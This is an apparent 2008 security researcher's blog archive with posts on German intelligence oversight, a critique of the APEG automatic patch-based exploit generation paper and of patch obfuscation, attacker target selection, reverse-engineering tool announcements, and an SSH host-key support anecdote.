The issue came to light because during the surveillance a German reporter had her email read, too (she was communicating with an Afghan official whose emails were being read). This is a violation of the freedom of the press here in Germany, and normally, the BND should've dealt with this by reporting their breach to the parliamentary subcommittee for intelligence oversight, which they somehow didn't. A whistleblower inside the BND then sent a letter to a bunch of politicians, making the situation public.

It's always hard to make any judgements in cases as these, as the public information is prone to being unreliable, but it is encouraging that a whistleblower had the guts to send a letter out. I am a big fan of the notion that everyone is personally responsible for his democracy.

The topic of intelligence and democracies is always difficult: If one accepts the necessity of intelligence services (which, by their nature, operate in dodgy terrain, and which, due to their requirements for secrecy, are difficult to control democratically), then one has to make sure that parliamentary oversight works well. This implies that the intelligence agencies properly inform the parliamentary committee, and it also implies that the parliamentary committee keeps the information provided confidential.

There seem to be only two ways to construct parliamentary oversight in a democracy: Pre-operation or post-operation. Pre-operation would have the committee approve of any potentially problematic operation ahead of it being performed. If things go spectacularly wrong, the fault is to be blamed on the committee. The problem with this is secrecy: Such a committee is big, and for operational security it seems dangerous to disseminate any information this widely.

This appears to be the reason why most democracies seem to opt for a "post-operation" model: The services have in-house legal experts, and these legal experts judge on the 'legality' of a certain operation. The the operation takes place, and the committee is notified after the fact if something goes spectacularly wrong.

The trouble with this model appears to be that the intelligence service doesn't have much incentive to report any problems: They can always hope the problem goes away by itself. It is the higher-ups in the hierarchy that have to report to the committee, and they are the ones whose heads will roll if things go wrong.

It appears to be an organisational problem: Information is supposed to flow upwards in the organisational hierarchy, but at the same time, the messenger might be shot. This is almost certain to lead to a situation where important information is withheld.

I guess it's any managers nightmare that his "subordinates" (horrible word -- this should mean "the guys doing the work and understanding the issues") in the organisation start feeding him misinformation. Organisations start rotting quickly if the bottom-up flow of information is disrupted. The way things are set up here in Germany seems to encourage such disruptions. And if mid-level management is a failure but blocks this information from upper management, the guys in the trenches have not only the right, but the duty to send a letter to upper management.

I have no clue if there is any country that has these things organized in a better way -- it seems these problems haunt most democracies.

Anyhow, if anyone happens to stumble across the particular software used in this case, I think it would make for a terribly interesting weekend of reverse engineering -- I am terribly nosy to what sort of stuff the tool was capable of :)

Cheers,
Halvar

Friday, April 25, 2008

Patch obfuscation etc.

So it seems the APEG paper is getting a lot of attention these days, and some of the conclusions that are (IMO falsely) drawn from it are:
  • patch time to exploit is approaching zero
  • patches should be obfuscated
Before I go into details, a short summary of the paper:
  1. BinDiff-style algorithms are used to find changes between the patched and unpatched version
  2. The vulnerable locations are identified.
  3. Constraint formulas are generated from the code via three different methods:
    1. Static: A graph of all basic blocks on code paths between the vulnerability and the data input into the application is generated, and a constraint formula is generated from this graph.
    2. Dynamic: An execution trace is taken, and if the vulnerability occurs on a program path that one can already execute. Constraints are generated from this path.
    3. Dynamic/Static: Instead of going from data input to target vulnerability (as in the static approach), one can use an existing path that comes "close" to the vulnerability as starting point from which to proceed with the static approach.
  4. The (very powerful) solver STP is used for solving these constraint systems, generating inputs that exercise a particular code path that triggers the vulnerability.
  5. A number of vulnerabilities are discussed which were successfully triggered using the methods described in the paper
  6. The conclusion is drawn that within minutes of receiving a patch, attackers can use automatically generated exploits to compromise systems.
In essence, the paper implements automated input crafting. The desire to do this has been described before -- Sherri Sparks' talk on "Sidewinder" (using genetic algorithms to generate inputs to exercise a particular path) comes to mind, and many discussions about generating a SAT problem from a particular program path to be fed into a SAT solver (or any other solver for that matter).

What the APEG paper describes is impressive -- using STP is definitely a step forwards, as it appears that STP is a much superior solver to pretty much everything else that's publically available.

It is equally important to keep the limitations of this approach in mind - people are reacting in a panicked manner without necessarily understanding what this can and cannot do.
  1. Possible NP-hardness of the problem. Solving for a particular path is essentially an instance of SAT, and we know that this can be NP-hard. It doesn't have to be, but the paper indicates many formulas STP cannot solve in reasonable time. While this doesn't imply that these formulas are in fact hard to solve, it shows how much this depends on the quality of your solver and the complexity of the formulas that are generated.
  2. The method described in the paper does not generate exploits. It triggers vulnerabilities. Anyone who has worked on even a moderately complex issue in the past knows that there is often a long and painful path between triggering an overflow and making use of it. The paper implies that the results of APEG are immediately available to compromise systems. This is, plainly, not correct. If APEG is successful, the results can be used to cause a crash of a process, and I refuse to call this a "compromise". Shooting a foreign politician is not equal to having your intelligence agency compromise him.
  3. Semantic issues. All vulnerabilities for which this method worked were extremely simple. The actual interesting IGMP overflow Alex Wheeler had discovered, for example, would not be easily dealt with by these methods -- because program state has to be modified for that exploit in a non-trivial way. In essence, a patch can tell you that "this value YY must not exceed XX", but if YY is not direct user data but indirectly calculated through other program events, it is not (yet) possible to automatically set YY.
So in short one could say that APEG will succeed in triggering a vulnerability if the following conditions are met:
  1. The program path between the vulnerability and code that one already knows how to execute is comparatively simple
  2. The generated equation systems are not too complex for the solver
  3. The bug is "linear" in the sense that no complicated manipulation of program state is required to trigger the vulnerability
This is still very impressive stuff, but it reads a lot less dramatic than "one can generate an exploit automatically from an arbitrary patch". All in all, great work, and I do not cease to be amazed by the results that STP has brought to code analysis in general. It confirms that better solvers ==> better code analysis.

What the paper gets wrong IMO are the conclusions about what should be done in the patching process. It argues that because "exploits can be generated automatically, the patching process needs fixing". This is a flawed argument, as ... uhm ... useful exploits can't (yet) be generated automatically. Triggering a vulnerability is not the same as exploiting it, especially under modern operating systems (due to ASLR/DEP/Pax/GrSec).

The paper proposes a number of ways of fixing the problems with the current patching process:

1. Patch obfuscation. The proposal that zombie-like comes back every few years: Let's obfuscate security patches, and all will be good. The problems with this are multifold, and quite scary:
    1. Obfuscated executables make debugging for MS ... uhm ... horrible, unless they can undo it themselves
    2. Obfuscated patches remove an essential liberty for the user: The liberty to have a look at a patch and make sure that the patch isn't in fact a malicious backdoor.
    3. We don't have good obfuscation methods that do not carry a horrible performance impact.
    4. Obfuscation methods have the property that they need to be modified whenever attackers break them automatically. The trouble is: Nobody would know if the attackers have broken them. It is thus safe to assume that after a while, the obfuscation would be broken, but nobody would be aware of it.
    5. Summary: Obfuscation would probably a) impact the user by making his code slower and b) impact the user by disallowing him from verifying that a patch is not malicious and c) create support nightmares for MS because they will have to debug obfuscated code. At the same time, it will not provide long-term security.
2. Patch encryption: Distributing encrypted patches, and then finally distributing the encryption key so all systems update at once. This proposal seems to assume that bandwidth is the limiting factor in patch installation, which, as far as I can tell, it is not. This proposal does less damage than obfuscation though -- instead of creating certain disaster with questionable benefit, this proposal just "does nothing" with questionable benefit.

3. Faster patch distribution. A laudable goal, nothing wrong with this.

Anyhow, long post, short summary: The APEG paper is really good, but it uses confusing terminology (exploit ~= vulnerability trigger) which leads to it's impact on patch distribution being significantly overstated. It's good work, but the sky isn't falling, and we are far away from generating reliable exploits automatically from arbitrary patches. APEG does generate usable vulnerability triggers for vulnerabilities of a certain form. And STP-style solvers are important.
I have not been blogging nor following the news much in recent months, as I am frantically trying to get all my university work sorted. While I have been unsuccessful at getting everything sorted at the schedule I had set myself, I am making progress, and expect to be more visibly active again in fall.

Today, I found out that my blog entry on the BlueHat blog drew more feedback than I had thought. I am consistently surprised that people read the things that I write.

Reading my blog post again, I find it so terse I feel I have to apologize for it and explain how it ended up this way. It was the last day of Bluehat, and I was very tired. Those that know me know me well know that my sense of humor is difficult at the best of times. I have a great talent of sounding bitter and sarcastic when in fact I am trying to be funny and friendly (this had lead to many unfortunate situations in my life :-). So I sat down and tried to write a funny blog post. I was quite happy with it when it was done.

In an attack of unexpected sanity, I decided that someone else should read over the post, so I asked Nitin, a very smart (and outrageously polite) MS engineer. He read it, and told me (in his usual very polite manner) ... that the post sucked. I have to be eternally thankful to him, because truly, it did. Thanks Nitin !

So I deleted it, and decided that writing down just the core points of the first post. I removed all ill-conceived attempts at humor, which made the post almost readable. It also limited the room for potential misunderstandings.

I would like to clarify a few things that seem to have been misunderstood though:

I did not say "hackers have to" move to greener pastures. I said "hackers will move to greener pastures for a while". This is a very important distinction. In order to clarify this, I will have to draw a bit of a larger arc:

Attackers are, at their heart, opportunists. Attacks go by the old basketball saying about jumpshot technique: "Whoever scores is right". There is no "wrong" way of compromising a system. Success counts, and very little else.

When attackers pick targets, they consider the following dimensions:
  • Strategic position of the target. I will not go into this (albeit important) point too deeply. Let's just assume that, since we're discussing Vista (a desktop OS), the attacker has made up his mind and wishes to compromise a client machine.
  • Impact by market share: The more people you can hack, the better. A widely-installed piece of software beats a non-widely installed piece of software in most cases. There's many ways of doing this (Personal estimates, Gartner reports, internet-wide scans etc.).
  • Wiggle Room: How many ways are there for the attacker to interact with the software ? How much functionality does the software have that operates on potentially attacker-supplied data ? If there are many ways to interact with the application, the odds of being able to turn a bug into a usable attack are greatly increased, and the odds of being able to reach vulnerable code locations are greatly increased. Perhabs the more widely used term is "attack surface", but that term fails to convey the importance of "wiggle room" for exploit reliability. Any interaction with the program is useful.
  • Estimated quality of code: Finding useful bugs is actually quite time consuming. With some experience, a few glances at the code will give an experienced attacker some sort of "gut feeling" about the overall quality of the code.
From these four points, it is clear why IE and MSRPC got hammered so badly in the past: They pretty much had optimal scores on Impact -- they were everywhere. They provided plenty of "Wiggle Room": IE with client-side scripting (yay!), MSRPC through the sheer number of different RPC calls available. The code quality was favourable to the attacker up until WinXP SP2, too.

MS has put more money into SDL than most other software vendors. This holds true both in absolute and in relative terms. MS is in a very strong position economically, so they can afford things other vendors (who, contrastingly, are exposed to market forces) cannot.

The code quality has improved markedly, decreasing the score on the 4th dimension. Likewise, there has been some reduction in attack surface, decreasing the score on the 3rd dimension. This is enough to convince attackers that their time is better spent on 'weaker' targets. The old chestnut about "you don't have to outrun the bear, you just have to outrun your co-hikers" holds true in security more than anywhere else.

In the end, it is much more attractive to attack Flash (maximum score on all dimensions) or any other browser plugins that are widely used.

I stand by my quote that "Vista is arguably the most secure closed-source OS available on the market".

This doesn't mean it's flawless. It just means it's more secure than previous versions of Windows, and more secure than OS X.

There was a second part to my blog post, where I mentioned that attackers are waiting for MS to become complacent again. I have read that many people inside Microsoft cannot imagine becoming complacent on security again. While I think this is true on the engineering level, it is imaginable that security might be scaled down by management.

The sluggish adoption of Vista by end-users is a clear sign that security does not necessarily sell. People buy features, and they cannot judge the relative security of the system. It is thus imaginable that people concerned with the bottom line decide to emphasize features over security again -- in the end, MS is a business, and the business benefits of investing in making code more secure have yet to materialize.

We'll see how this all plays out :-)

Anyhow, the next BlueHat is coming up. I won't attend this time, but I am certain that it will be an interesting event.

Wednesday, April 02, 2008

My valued coworker, SP, has just released his "pet project", Hexer. Hexer is a platform-independent Java-based extendible hex editor and can be downloaded under http://www.zynamics.com/files/Hexer-1_0_0.rar

It's also a good idea to visit his blog where he'll write more about it's features and capabilities.

Tuesday, April 01, 2008

Oh, before I forget: Ero & me will be presenting on our work on structural malware classification at RSA next week. If anyone wishes to schedule a meeting/demo of any of our things (VxClass/BinDiff/BinNavi), please do not hesitate to contact info@zynamics.com.


Some small eye candy: The screenshot shows BinNavi with our intermediate representation (REIL) made visible. While REIL is still very beta-ish, it should be a standard (and accessible) part of BinNavi at some point later this year.

Having a good IR which properly models side effects is a really useful thing to have: The guys over at the BitBlazer project in Berkeley have shown some really useful things that can be done using a good IR and a good constraint solver :-). I am positively impressed by several papers they have put out.

I also can't wait to have more of this sort of stuff in BinNavi :-).
Conspiracy theory of the day:

As everyone, I am following the US primaries, and occasionally discussing with my brother on the implications of the developments for the wider world. My brother is usually good for quite some counter-intuitive insights into things, and described to me a "conspiracy theory" that I find amusing/interesting enough to post here.

Please be aware that the following is non-partisan: I do not really have an idea on whether I'd prefer Mrs Clinton, Mr Obama or Mr McCain in the white house, and this is not a post that is intended to weigh in on either side.

I was a bit puzzled on why Mrs Clinton is still in the primary race even though her mathematical odds on winning the democratic nomination seem slim. The conspiracy theory explaining this is the following:

The true goal now for Mrs Clinton is now 2012, not 2008. If Mr Obama wins the nomination _and_ the presidency, Mrs Clinton will very likely not become president in her lifetime. On the other hand: If she manages to damage Mr Obama bad enough so that Mr McCain enters the white house, she has good cards to win the democratic nomination in 2012, and Mr McCain is unlikely to stay a second term (given his age).

It's an interesting hypothesis. Anyhow, I should really get to sleep.

Tuesday, March 11, 2008

A short real-life story on why cryptography breaks:

One of the machines that I am using is a vhost hosted at a german hosting provider called "1und1". Clearly, I am accessing this machine using ssh. So a few weeks ago, to my surprise, my ssh warned me about the host key having changed.

Honored by the thought that someone might take the effort to mount a man-in-the-middle attack for this particular box, my rational brain told me that I should call the tech support of the hosting provider first and ask if any event might've lead to a change in keys.

After a rather lengthy interaction with the tech support (who first tried to brush me off by telling me to "just accept the new key"), I finally got them to tell me that they upgraded the OS and that the key had changed. After about 20 minutes of discussion, I finally got them to read the new key to me over the phone, and all was good.

Then, today, the warning cropped up again. I called tech support, a bit annoyed by these frequent changes. My experience was less than stellar - the advice I received was:
  1. "Just accept the new key"
  2. "The key is likely going to change all the time due to frequent relocations of the vhost so you should always accept it"
  3. "No, there is no way that they can notify me over the phone or in a signed email when the key changes"
  4. "It is highly unlikely that any change that would notify you would be implemented"
  5. "If I am concerned about security, I should really buy an SSL certificate from them" (wtf ??)
  6. "No, it is not possible to read me the key fingerprint over the phone"
The situation got better by the minute. After I told them that last time the helpful support had at least read me the fingerprint over the phone, the support person asked how I could be sure that my telephone call hadn't been man-in-the-middled...

I started becoming slightly agitated at this point. I will speak with them again tomorrow, perhabs I'll be lucky enough to get to 3rd-level-support instead of 2nd level. Hrm. As if "customer service" is a computer game, with increasingly difficult levels.

So. Summary: 1und1 seems to think crypto is useless and we should all use telnet. Excellent :-/

Friday, March 07, 2008


Hey all,

we have released BinNavi v1.5 last week. Normally, I'd write a lot of stuff here about the new features and all, but this will have to wait for a few days -- I am very tied up with some other work.

With the v1.5 release, we have added disassembly exporters that export from both OllyDbg and ImmunityDbg to our database format -- this means that Navi can now use disassemblies generated from those two debuggers, too. The screenshot above is BinNavi running on Ubuntu with a disassembly exported from the Windows VW into which we are debugging.

Anyhow, the real reason for this post is something completely different: We don't advertise this much on our website, but our tools are available in a sort of 'academic program':

If you are currently enrolled as a full-time-student at a university and have an interesting problem you'd like to use our tools for, you can get a license of our tools (Diff/Navi) for a very moderate amount of money. All you have to do is:
  • Contact us (info@zynamics.com) with your name/address/university etc.
  • Explain what project you'd like to work on with our tools
  • Sign an agreement that you will write a paper about your work (after it's done) that we can put on our website
Oh, and you of course have to do the work then and write the paper :-)
Anyhow, I have to get back to work. Expect more posts from me later this year -- things are very busy for me at the moment.

Cheers,
Halvar

Tuesday, February 12, 2008

Hey all,

We will be releasing BinNavi v1.5 next week -- and I can happily say that we will have
many cool improvements that I will blog about next week, once it is out.

Pictures often speak louder than words, so I'll post some of them here:

http://www.zynamics.com/files/navi15.1.png
http://www.zynamics.com/files/navi15.2.png
http://www.zynamics.com/files/navi15.3.png
http://www.zynamics.com/files/tree_lookup.jpg

A more detailed list of new features will be posted next week.

VxClass is making progress as well -- but more on this next week.

If there's anyone interested in our products (BinDiff, BinNavi, VxClass)
in the DC area, I should be free to meet & do a presentation on the products
next week.

Cheers,
Halvar

Tuesday, January 08, 2008

Happy new year everyone.

In June 2006 Dave Aitel wrote on Dailydave that "wormable bugs" are getting rarer. I think he is right, but this month's patch tuesday brings us a particularly cute bug.

I have created a small shockwave film and uploaded it to
http://www.zynamics.com/files/ms08001.swf

Enjoy ! :-)

On other news: We'll be posting screenshots of BinNavi v1.5 (due out in February) and the current VxClass version in the next two weeks - they are coming along nicely.

Cheers,
Halvar